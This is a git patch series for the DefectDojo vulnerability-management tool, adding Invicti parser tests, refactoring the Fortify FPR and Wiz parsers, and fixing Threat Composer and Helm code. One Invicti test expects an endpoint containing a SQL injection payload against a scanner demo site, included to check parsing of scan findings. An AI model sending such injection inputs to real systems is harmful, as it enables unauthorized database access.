    2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    ", + "ExploitationSkills": "", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + } + ] +} \ No newline at end of file diff --git a/unittests/tools/test_invicti_parser.py b/unittests/tools/test_invicti_parser.py new file mode 100644 index 00000000000..aca5bfadd78 --- /dev/null +++ b/unittests/tools/test_invicti_parser.py @@ -0,0 +1,98 @@ +from dojo.models import Test +from dojo.tools.invicti.parser import InvictiParser +from unittests.dojo_test_case import DojoTestCase + + +class TestInvictiParser(DojoTestCase): + + def test_parse_file_with_one_finding(self): + with open("unittests/scans/invicti/invicti_one_finding.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + def test_parse_file_with_multiple_finding(self): + with open("unittests/scans/invicti/invicti_many_findings.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(16, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + with self.subTest(i=1): + finding = findings[1] + self.assertEqual("Critical", finding.severity) + self.assertEqual(89, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7=10") + + with self.subTest(i=2): + finding = findings[2] + self.assertEqual("Medium", finding.severity) + self.assertEqual(205, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com") + + def test_parse_file_issue_9816(self): + with open("unittests/scans/invicti/issue_9816.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual(614, finding.cwe) + self.assertEqual("03/02/2019", finding.date.strftime("%d/%m/%Y")) + + def test_parse_file_issue_10311(self): + with open("unittests/scans/invicti/issue_10311.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual(614, finding.cwe) + self.assertEqual("03/02/2019", finding.date.strftime("%d/%m/%Y")) From fa4ed047e563cc1c929d83858bc3027701f2b52e Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:33:24 -0500 Subject: [PATCH 12/62] Fortify Parser: Fortification of the the FPR parsing (#10901) * Fortify Parser: Fortification of the the FPR parsing * Update dojo/tools/fortify/parser.py Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- dojo/tools/fortify/fpr_parser.py | 203 ++++++++++++++++++++++--------- dojo/tools/fortify/parser.py | 3 + 2 files changed, 148 insertions(+), 58 deletions(-) diff --git a/dojo/tools/fortify/fpr_parser.py b/dojo/tools/fortify/fpr_parser.py index d0d62e2aa92..a5a11051356 100644 --- a/dojo/tools/fortify/fpr_parser.py +++ b/dojo/tools/fortify/fpr_parser.py @@ -1,9 +1,10 @@ import re import zipfile +from xml.etree.ElementTree import Element from defusedxml import ElementTree -from dojo.models import Finding +from dojo.models import Finding, Test class FortifyFPRParser: @@ -12,70 +13,156 @@ def parse_fpr(self, filename, test): input_zip = zipfile.ZipFile(filename.name, "r") else: input_zip = zipfile.ZipFile(filename, "r") - zipdata = {name: input_zip.read(name) for name in input_zip.namelist()} - root = ElementTree.fromstring(zipdata["audit.fvdl"].decode("utf-8")) + # Read each file from the zip artifact into a dict with the format of + # filename: file_content + zip_data = {name: input_zip.read(name) for name in input_zip.namelist()} + root = self.identify_root(zip_data) + return self.parse_vulnerabilities_and_convert_to_findings(root, test) + + def identify_root(self, zip_data: dict) -> Element: + """Iterate through the zip data to determine which file in the zip could be the XMl to be parsed.""" + # Determine where the "audit.fvdl" could be + audit_file = None + for file_name in zip_data: + if file_name.endswith("audit.fvdl"): + audit_file = file_name + break + # Make sure we have an audit file + if audit_file is None: + msg = 'A search for an "audit.fvdl" file was not successful. ' + raise ValueError(msg) + # Parser the XML file and determine the name space, if present + root = ElementTree.fromstring(zip_data.get(audit_file).decode("utf-8")) + self.identify_namespace(root) + return root + + def identify_namespace(self, root: Element) -> None: + """Determine what the namespace could be, and then set the value in a class var labeled `namespace`""" regex = r"{.*}" matches = re.match(regex, root.tag) try: - namespace = matches.group(0) + self.namespace = matches.group(0) except BaseException: - namespace = "" + self.namespace = "" + + def parse_vulnerabilities_and_convert_to_findings(self, root: Element, test: Test) -> list[Finding]: + """Parse the XML and generate a list of findings.""" items = [] for child in root: if "Vulnerabilities" in child.tag: for vuln in child: - ClassID = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}ClassID").text - Kingdom = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}Kingdom").text - Type = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}Type").text - AnalyzerName = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}AnalyzerName").text - DefaultSeverity = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}DefaultSeverity").text - InstanceID = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}InstanceID").text - InstanceSeverity = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}InstanceSeverity").text - Confidence = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}Confidence").text - SourceLocationpath = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("path") - SourceLocationline = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("line") - SourceLocationlineEnd = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("lineEnd") - SourceLocationcolStart = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("colStart") - SourceLocationcolEnd = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("colEnd") - SourceLocationsnippet = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("snippet") - description = Type + "\n" - severity = self.fpr_severity(Confidence, InstanceSeverity) - description += "**ClassID:** " + ClassID + "\n" - description += "**Kingdom:** " + Kingdom + "\n" - description += "**AnalyzerName:** " + AnalyzerName + "\n" - description += "**DefaultSeverity:** " + DefaultSeverity + "\n" - description += "**InstanceID:** " + InstanceID + "\n" - description += "**InstanceSeverity:** " + InstanceSeverity + "\n" - description += "**Confidence:** " + Confidence + "\n" - description += "**SourceLocationpath:** " + str(SourceLocationpath) + "\n" - description += "**SourceLocationline:** " + str(SourceLocationline) + "\n" - description += "**SourceLocationlineEnd:** " + str(SourceLocationlineEnd) + "\n" - description += "**SourceLocationcolStart:** " + str(SourceLocationcolStart) + "\n" - description += "**SourceLocationcolEnd:** " + str(SourceLocationcolEnd) + "\n" - description += "**SourceLocationsnippet:** " + str(SourceLocationsnippet) + "\n" - items.append( - Finding( - title=Type + " " + ClassID, - severity=severity, - static_finding=True, - test=test, - description=description, - unique_id_from_tool=ClassID, - file_path=SourceLocationpath, - line=SourceLocationline, - ), - ) + finding_context = { + "title": "", + "description": "", + "static_finding": True, + "test": test, + } + self.parse_class_information(vuln, finding_context) + self.parse_instance_information(vuln, finding_context) + self.parse_analysis_information(vuln, finding_context) + self.parse_severity_and_convert(vuln, finding_context) + items.append(Finding(**finding_context)) return items - def fpr_severity(self, Confidence, InstanceSeverity): - if float(Confidence) >= 2.5 and float(InstanceSeverity) >= 2.5: - severity = "Critical" - elif float(Confidence) >= 2.5 and float(InstanceSeverity) < 2.5: - severity = "High" - elif float(Confidence) < 2.5 and float(InstanceSeverity) >= 2.5: - severity = "Medium" - elif float(Confidence) < 2.5 and float(InstanceSeverity) < 2.5: - severity = "Low" - else: - severity = "Info" - return severity + def parse_severity_and_convert(self, vulnerability: Element, finding_context: dict) -> None: + """Convert the the float representation of severity and confidence to a string severity.""" + # Default info severity in the case of an error + severity = "Info" + instance_severity = None + confidence = None + # Attempt to fetch the confidence and instance severity + if (instance_info := vulnerability.find(f"{self.namespace}InstanceInfo")) is not None: + instance_severity = getattr(instance_info.find(f"{self.namespace}InstanceSeverity"), "text", None) + confidence = getattr(instance_info.find(f"{self.namespace}Confidence"), "text", None) + # Make sure we have something to work with + if confidence is not None and instance_severity is not None: + if float(confidence) >= 2.5 and float(instance_severity) >= 2.5: + severity = "Critical" + elif float(confidence) >= 2.5 and float(instance_severity) < 2.5: + severity = "High" + elif float(confidence) < 2.5 and float(instance_severity) >= 2.5: + severity = "Medium" + elif float(confidence) < 2.5 and float(instance_severity) < 2.5: + severity = "Low" + # Return either info, or the calculated severity + finding_context["severity"] = severity + + def parse_class_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any class information that can be extracted.""" + if (class_info := vulnerability.find(f"{self.namespace}ClassInfo")) is not None: + if (namespace_type := class_info.find(f"{self.namespace}Type")) is not None: + finding_context["description"] += f"{namespace_type.text}\n" + finding_context["title"] += f"{namespace_type.text}" + if (class_id := class_info.find(f"{self.namespace}ClassID")) is not None: + finding_context["description"] += f"**ClassID:** {class_id.text}\n" + finding_context["unique_id_from_tool"] = class_id.text + finding_context["title"] += f" {class_id.text}" + if (kingdom := class_info.find(f"{self.namespace}Kingdom")) is not None: + finding_context["description"] += f"**Kingdom:** {kingdom.text}\n" + if (analyzer_name := class_info.find(f"{self.namespace}AnalyzerName")) is not None: + finding_context["description"] += f"**AnalyzerName:** {analyzer_name.text}\n" + if (default_severity := class_info.find(f"{self.namespace}DefaultSeverity")) is not None: + finding_context["description"] += f"**DefaultSeverity:** {default_severity.text}\n" + + def parse_instance_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any instance information that can be extracted.""" + if (instance_info := vulnerability.find(f"{self.namespace}InstanceInfo")) is not None: + if (instance_id := instance_info.find(f"{self.namespace}InstanceID")) is not None: + finding_context["description"] += f"**InstanceID:** {instance_id.text}\n" + if (instance_severity := instance_info.find(f"{self.namespace}InstanceSeverity")) is not None: + finding_context["description"] += f"**InstanceSeverity:** {instance_severity.text}\n" + if (confidence := instance_info.find(f"{self.namespace}Confidence")) is not None: + finding_context["description"] += f"**Confidence:** {confidence.text}\n" + + def parse_analysis_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any analysis information that can be extracted.""" + if (analysis_info := vulnerability.find(f"{self.namespace}AnalysisInfo")) is not None: + # See if we can get a SourceLocation from this + if (source_location := self.get_source_location(analysis_info)) is not None: + path = source_location.attrib.get("path") + line = source_location.attrib.get("line") + # Managed the description + finding_context["description"] += f"**SourceLocationPath:** {path}\n" + finding_context["description"] += f"**SourceLocationLine:** {line}\n" + finding_context["description"] += ( + f"**SourceLocationLineEnd:** {source_location.attrib.get('lineEnd')}\n" + ) + finding_context["description"] += ( + f"**SourceLocationColStart:** {source_location.attrib.get('colStart')}\n" + ) + finding_context["description"] += f"**SourceLocationColEnd:** {source_location.attrib.get('colEnd')}\n" + finding_context["description"] += ( + f"**SourceLocationSnippet:** {source_location.attrib.get('snippet')}\n" + ) + # manage the other metadata + finding_context["file_path"] = path + finding_context["line"] = line + + def get_source_location(self, analysis_info: Element) -> Element | None: + """Return the SourceLocation element if we are able to reach it.""" + # The order of this list is very important. Do not reorder it! + key_path = [ + "Unified", + "Trace", + "Primary", + "Entry", + "Node", + "SourceLocation", + ] + # iterate of the keys until we find something that cannot be fulfilled + current_element = analysis_info + # Traverse the key path up to "Entry" to fetch all Entry elements + for key in key_path[:-3]: # stop before "Entry" level + if (next_current_element := current_element.find(f"{self.namespace}{key}")) is not None: + current_element = next_current_element + else: + return None + # Iterate over all "Entry" elements + entries = current_element.findall(f"{self.namespace}Entry") + for entry in entries: + # Continue the search for "Node" and "SourceLocation" within each entry + if (node := entry.find(f"{self.namespace}Node")) is not None: + if (source_location := node.find(f"{self.namespace}SourceLocation")) is not None: + return source_location + # Return None if no SourceLocation was found in any Entry + return None diff --git a/dojo/tools/fortify/parser.py b/dojo/tools/fortify/parser.py index 2b1f3e21e3d..b6f7e5185c8 100644 --- a/dojo/tools/fortify/parser.py +++ b/dojo/tools/fortify/parser.py @@ -17,3 +17,6 @@ def get_findings(self, filename, test): return FortifyXMLParser().parse_xml(filename, test) elif str(filename.name).endswith(".fpr"): return FortifyFPRParser().parse_fpr(filename, test) + else: + msg = "Filename extension not recognized. Use .xml or .fpr" + raise ValueError(msg) From 5b25e16cf9bc9d7a027906432370089230f2a273 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81ngel=20Riveira?= <61965217+arivra@users.noreply.github.com> Date: Mon, 16 Sep 2024 04:24:36 +0200 Subject: [PATCH 13/62] manage not defined metadata in mitigations and add assumptions comments (#10897) --- dojo/tools/threat_composer/parser.py | 21 +++++++++++++------ .../threat_composer_many_threats.json | 9 ++------ 2 files changed, 17 insertions(+), 13 deletions(-) diff --git a/dojo/tools/threat_composer/parser.py b/dojo/tools/threat_composer/parser.py index 1babba06fd2..f1099641b07 100644 --- a/dojo/tools/threat_composer/parser.py +++ b/dojo/tools/threat_composer/parser.py @@ -70,12 +70,12 @@ def get_findings(self, file, test): if "threatAction" in threat: title = threat["threatAction"] - severity, impact, comments = self.parse_threat_metadata(threat["metadata"]) + severity, impact, comments = self.parse_threat_metadata(threat.get("metadata", [])) description = self.to_description_text(threat, comments, assumption_threat_links[threat["id"]]) mitigation = self.to_mitigation_text(mitigation_links[threat["id"]]) unique_id_from_tool = threat["id"] vuln_id_from_tool = threat["numericId"] - tags = threat["tags"] if "tags" in threat else [] + tags = threat.get("tags", []) finding = Finding( title=title, @@ -112,14 +112,12 @@ def to_mitigation_text(self, mitigations): counti = i + 1 text += f"**Mitigation {counti} (ID: {mitigation['numericId']}, Status: {mitigation.get('status', 'Not defined')})**: {mitigation['content']}" - for item in mitigation["metadata"]: + for item in mitigation.get("metadata", []): if item["key"] == "Comments": text += f"\n*Comments*: {item['value'].replace(linesep, ' ')} " break - for j, assumption in enumerate(assumption_links): - countj = j + 1 - text += f"\n- *Assumption {countj} (ID: {assumption['numericId']})*: {assumption['content'].replace(linesep, ' ')}" + text += self.to_assumption_text(assumption_links) text += "\n" @@ -145,8 +143,19 @@ def to_description_text(self, threat, comments, assumption_links): if comments: text += f"\n*Comments*: {comments}" + text += self.to_assumption_text(assumption_links) + + return text + + def to_assumption_text(self, assumption_links): + text = "" for i, assumption in enumerate(assumption_links): counti = i + 1 text += f"\n- *Assumption {counti} (ID: {assumption['numericId']})*: {assumption['content'].replace(linesep, ' ')}" + for item in assumption.get("metadata", []): + if item["key"] == "Comments": + text += f"\n  *Comments*: {item['value'].replace(linesep, ' ')} " + break + return text diff --git a/unittests/scans/threat_composer/threat_composer_many_threats.json b/unittests/scans/threat_composer/threat_composer_many_threats.json index cb61d880bde..6af441362e3 100644 --- a/unittests/scans/threat_composer/threat_composer_many_threats.json +++ b/unittests/scans/threat_composer/threat_composer_many_threats.json @@ -94,13 +94,8 @@ "tags": [ "lorem ipsum" ], - "metadata": [ - { - "key": "Comments", - "value": "lorem ipsum" - } - ], - "displayOrder": 21 + "displayOrder": 21, + "status": "mitigationResolved" }, { "id": "11fb1c71-42f0-4004-89a7-09d8bf6f8b11", From e9824dca5f6d05cc4cf249cda9219d0b29f083b8 Mon Sep 17 00:00:00 2001 From: Vladimir Shelkovnikov <99356504+C4tWithShell@users.noreply.github.com> Date: Mon, 16 Sep 2024 05:25:02 +0300 Subject: [PATCH 14/62] Fix typo in ingress policy (#10898) --- helm/defectdojo/templates/network-policy.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helm/defectdojo/templates/network-policy.yaml b/helm/defectdojo/templates/network-policy.yaml index 251128004e9..80c55ddcfa3 100644 --- a/helm/defectdojo/templates/network-policy.yaml +++ b/helm/defectdojo/templates/network-policy.yaml @@ -13,7 +13,7 @@ spec: podSelector: matchLabels: app.kubernetes.io/instance: {{ .Release.Name }} - {{- if .Value.networkPolicy.ingress}} + {{- if .Values.networkPolicy.ingress}} ingress: {{- toYaml .Values.networkPolicy.ingress | nindent 4 }} {{- else }} From 0da81c6091b512052f0358d91ac33803cf755624 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 21:39:35 -0500 Subject: [PATCH 15/62] Wiz Parser: Add SCA parser and fortify old format (#10905) * Wiz Parser: Add SCA parser and fortify old format * Adding unit tests * Fix ruff --- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 +- dojo/tools/wiz/parser.py | 256 ++++++++++++++++------ unittests/scans/wiz/sca_format.csv | 6 + unittests/tools/test_wiz_parser.py | 60 ++++- 5 files changed, 254 insertions(+), 72 deletions(-) create mode 100644 unittests/scans/wiz/sca_format.csv diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index b6e48ee437c..38c8e498527 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -1a74292fc58b2bd05c763c8c126b0b35888e2a6f8ef9ab2588bb6c8589987c9c +702d74c8bc703d11c03cf5b3f7c4319ad0cdeaef68db6426d1112c59e59365a6 diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index 41f0631fa43..bd33f7fed8a 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1496,7 +1496,7 @@ def saml2_attrib_map_format(dict): "OSV Scan": DEDUPE_ALGO_HASH_CODE, "Nosey Parker Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, "Bearer CLI": DEDUPE_ALGO_HASH_CODE, - "Wiz Scan": DEDUPE_ALGO_HASH_CODE, + "Wiz Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, "Deepfence Threatmapper Report": DEDUPE_ALGO_HASH_CODE, "Kubescape JSON Importer": DEDUPE_ALGO_HASH_CODE, "Kiuwan SCA Scan": DEDUPE_ALGO_HASH_CODE, diff --git a/dojo/tools/wiz/parser.py b/dojo/tools/wiz/parser.py index a68ecae2bbe..f3125544748 100644 --- a/dojo/tools/wiz/parser.py +++ b/dojo/tools/wiz/parser.py @@ -1,91 +1,209 @@ import csv import io +import json +import logging import sys -from dojo.models import Finding +from dateutil import parser as date_parser +from dojo.models import SEVERITIES, Finding, Test -class WizParser: - def get_scan_types(self): - return ["Wiz Scan"] +logger = logging.getLogger(__name__) - def get_label_for_scan_types(self, scan_type): - return "Wiz Scan" - def get_description_for_scan_types(self, scan_type): - return "Wiz scan results in csv file format." +class WizParserByTitle: + """Parser the CSV where the "Title" field is the match for a finding title.""" - def get_findings(self, filename, test): - content = filename.read() - if isinstance(content, bytes): - content = content.decode("utf-8") - csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big - reader = csv.DictReader(io.StringIO(content)) + def parse_findings(self, test: Test, reader: csv.DictReader) -> list[Finding]: + """Parse the CSV with the assumed format of the link below. + + test file: https://github.com/DefectDojo/django-DefectDojo/blob/master/unittests/scans/wiz/multiple_findings.csv + """ findings = [] + description_fields = [ + "Description", + "Resource Type", + "Resource external ID", + "Subscription ID", + "Project IDs", + "Project Names", + "Control ID", + "Resource Name", + "Resource Region", + "Resource Status", + "Resource Platform", + "Resource OS", + "Resource original JSON", + "Issue ID", + "Resource vertex ID", + "Ticket URLs", + "Note", + "Due At", + "Subscription Name", + "Wiz URL", + "Cloud Provider URL", + "Resource Tags", + "Kubernetes Cluster", + "Kubernetes Namespace", + "Container Service", + ] + # Iterate over the objects to create findings for row in reader: if row.get("Status").lower() == "open": - Title = row.get("Title") - Severity = row.get("Severity") - Description = row.get("Description") - Resource_Type = row.get("Resource Type") - Resource_external_ID = row.get("Resource external ID") - Subscription_ID = row.get("Subscription ID") - Project_IDs = row.get("Project IDs") - Project_Names = row.get("Project Names") - Control_ID = row.get("Control ID") - Resource_Name = row.get("Resource Name") - Resource_Region = row.get("Resource Region") - Resource_Status = row.get("Resource Status") - Resource_Platform = row.get("Resource Platform") - Resource_OS = row.get("Resource OS") - Resource_original_JSON = row.get("Resource original JSON") - Issue_ID = row.get("Issue ID") - Resource_vertex_ID = row.get("Resource vertex ID") - Ticket_URLs = row.get("Ticket URLs") - Note = row.get("Note") - Due_At = row.get("Due At") - Subscription_Name = row.get("Subscription Name") - Wiz_URL = row.get("Wiz URL") - Cloud_Provider_URL = row.get("Cloud Provider URL") - Resource_Tags = row.get("Resource Tags") - Kubernetes_Cluster = row.get("Kubernetes Cluster") - Kubernetes_Namespace = row.get("Kubernetes Namespace") - Container_Service = row.get("Container Service") + title = row.get("Title") + severity = row.get("Severity") + mitigation = row.get("Remediation Recommendation") description = "" - description += "**Description**: " + Description + "\n" - description += "**Resource Type**: " + Resource_Type + "\n" - description += "**external ID**: " + Resource_external_ID + "\n" - description += "**Subscription ID**: " + Subscription_ID + "\n" - description += "**Project IDs**: " + Project_IDs + "\n" - description += "**Project Names**: " + Project_Names + "\n" - description += "**Control ID**: " + Control_ID + "\n" - description += "**Resource Name**: " + Resource_Name + "\n" - description += "**Resource Region**: " + Resource_Region + "\n" - description += "**Resource Status**: " + Resource_Status + "\n" - description += "**Resource Platform**: " + Resource_Platform + "\n" - description += "**Resource OS**: " + Resource_OS + "\n" - description += "**original JSON**: " + Resource_original_JSON + "\n" - description += "**Issue ID**: " + Issue_ID + "\n" - description += "**vertex ID**: " + Resource_vertex_ID + "\n" - description += "**Ticket URLs**: " + Ticket_URLs + "\n" - description += "**Note**: " + Note + "\n" - description += "**Due At**: " + Due_At + "\n" - description += "**Subscription Name**: " + Subscription_Name + "\n" - description += "**Wiz URL**: " + Wiz_URL + "\n" - description += "**Provider URL**: " + Cloud_Provider_URL + "\n" - description += "**Resource Tags**: " + Resource_Tags + "\n" - description += "**Kubernetes Cluster**: " + Kubernetes_Cluster + "\n" - description += "**Kubernetes Namespace**: " + Kubernetes_Namespace + "\n" - description += "**Container Service**: " + Container_Service + "\n" + # Iterate over the description fields to create the description + for field in description_fields: + if (field_value := row.get(field)) is not None and len(field_value) > 0: + description += f"**{field}**: {field_value}\n" + # Create the finding object findings.append( Finding( - title=Title, + title=title, description=description, - severity=Severity.lower().capitalize(), + severity=severity.lower().capitalize(), static_finding=False, dynamic_finding=True, - mitigation=row.get("Remediation Recommendation"), + mitigation=mitigation, test=test, ), ) return findings + + +class WizParserByDetailedName: + """Parser the CSV where the "DetailedName" and "Name" fields are the match for a finding title.""" + + def parse_findings(self, test: Test, reader: csv.DictReader) -> list[Finding]: + """Parse the CSV with the assumed format of the link below. + + test file: Coming soon! + """ + findings = [] + description_fields = { + "WizURL": "Wiz URL", + "HasExploit": "Has Exploit", + "HasCisaKevExploit": "Has Cisa Kev Exploit", + "LocationPath": "Location Path", + "Version": "Version", + "DetectionMethod": "Detection Method", + "Link": "Link", + "Projects": "Projects", + "AssetID": "Asset ID", + "AssetName": "Asset Name", + "AssetRegion": "Asset Region", + "ProviderUniqueId": "Provider Unique Id", + "CloudProviderURL": "Cloud Provider URL", + "CloudPlatform": "Cloud Platform", + "SubscriptionExternalId": "Subscription External Id", + "SubscriptionId": "Subscription Id", + "SubscriptionName": "Subscription Name", + "ExecutionControllers": "Execution Controllers", + "ExecutionControllersSubscriptionExternalIds": "Execution Controllers Subscription External Ids", + "ExecutionControllersSubscriptionNames": "Execution Controllers Subscription Names", + "OperatingSystem": "Operating System", + "IpAddresses": "Ip Addresses", + } + mitigation_fields = { + "LocationPath": "Location Path", + "FixedVersion": "Fixed Version", + "Remediation": "Remediation", + } + + for row in reader: + # Common fields + vulnerability_id = row.get("Name") + package_name = row.get("DetailedName") + package_version = row.get("Version") + severity = row.get("VendorSeverity") + finding_id = row.get("ID") + + description = self._construct_string_field(description_fields, row) + mitigation = self._construct_string_field(mitigation_fields, row) + status_dict = self._convert_status(row) + # Create the finding object + finding = Finding( + title=f"{package_name}: {vulnerability_id}", + description=description, + mitigation=mitigation, + severity=self._validate_severities(severity), + static_finding=True, + unique_id_from_tool=finding_id, + component_name=package_name, + component_version=package_version, + date=date_parser.parse(row.get("FirstDetected")), + test=test, + **status_dict, + ) + finding.unsaved_vulnerability_ids = [vulnerability_id] + finding.unsaved_tags = self._parse_tags(row.get("Tags", "[]")) + findings.append(finding) + return findings + + def _construct_string_field(self, fields: dict[str, str], row: dict) -> str: + """Construct a formatted string based on the fields dict supplied.""" + return_string = "" + for field, pretty_field in fields.items(): + if (field_value := row.get(field)) is not None and len(field_value) > 0: + return_string += f"**{pretty_field}**: `{field_value}`\n" + return return_string + + def _parse_tags(self, tags: str) -> list[str]: + """parse the Tag string dict, and convert to a list of strings. + + The format of the tags is is "{""key"":""value""}" format + """ + # Convert the string to a dict + tag_dict = json.loads(tags) + return [f"{key}: {value}" for key, value in tag_dict.items()] + + def _validate_severities(self, severity: str) -> str: + """Ensure the supplied severity fits what DefectDojo is expecting.""" + if severity not in SEVERITIES: + logger.error(f"Severity is not supported: {severity}") + # Default to Info severity + return "Info" + return severity + + def _convert_status(self, row: dict) -> dict: + """Convert the "FindingStatus" column to a dict of Finding statuses. + + - Open-> Active = True + - Other statuses that may exist... + """ + if (status := row.get("FindingStatus")) is not None: + if status == "Open": + return {"active": True} + # Return the default status of active + return {"active": True} + + +class WizParser( + WizParserByTitle, + WizParserByDetailedName, +): + def get_scan_types(self): + return ["Wiz Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Wiz Scan" + + def get_description_for_scan_types(self, scan_type): + return "Wiz scan results in csv file format." + + def get_findings(self, filename, test): + content = filename.read() + if isinstance(content, bytes): + content = content.decode("utf-8") + csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big + reader = csv.DictReader(io.StringIO(content)) + # Determine which parser to use + if "Title" in reader.fieldnames: + return WizParserByTitle().parse_findings(test, reader) + if all(field in reader.fieldnames for field in ["Name", "DetailedName"]): + return WizParserByDetailedName().parse_findings(test, reader) + else: + msg = "This CSV format of Wiz is not supported" + raise ValueError(msg) diff --git a/unittests/scans/wiz/sca_format.csv b/unittests/scans/wiz/sca_format.csv new file mode 100644 index 00000000000..c77dd7ea799 --- /dev/null +++ b/unittests/scans/wiz/sca_format.csv @@ -0,0 +1,6 @@ 